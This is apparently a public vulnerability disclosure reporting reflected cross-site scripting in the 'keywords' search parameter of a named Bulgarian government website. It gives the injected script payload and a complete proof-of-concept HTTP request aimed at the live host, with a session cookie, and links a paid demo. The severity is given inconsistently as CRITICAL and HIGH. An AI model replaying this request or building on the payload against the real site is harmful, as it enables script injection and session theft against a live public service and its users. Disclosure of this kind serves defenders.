## Titles: ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting (reflected)
## Author: nu11secur1ty
## Date: 1/18/2026
## Vendor: ahu.mlsp.government.bg
## Software: ahu.mlsp.government.bg
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The value of the `keywords` request parameter is copied into the HTML
document as plain text between tags. The payload
fpizv<script>alert(1)</script>b6a49ruc4py was submitted in the keywords
parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application's response.  The original request
used the POST method, however it was possible to convert the request to use
the GET method, to enable easier demonstration and delivery of the attack.

STATUS: HIGH- Vulnerability

[+]PoC:
```
GET /search/?keywords=fpizv%3cscript%3ealert(1)%3c%2fscript%3eb6a49ruc4py
HTTP/1.1
Host: ahu.mlsp.government.bg
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=B73DAEC7FBA9D531A0EA45F18C6A5B19
Origin: null
Upgrade-Insecure-Requests: 1

```

## Demo PoC:
[href](https://www.patreon.com/posts/ahu-mlsp-bg-xss-148520630)

## Time spent:
01:27:00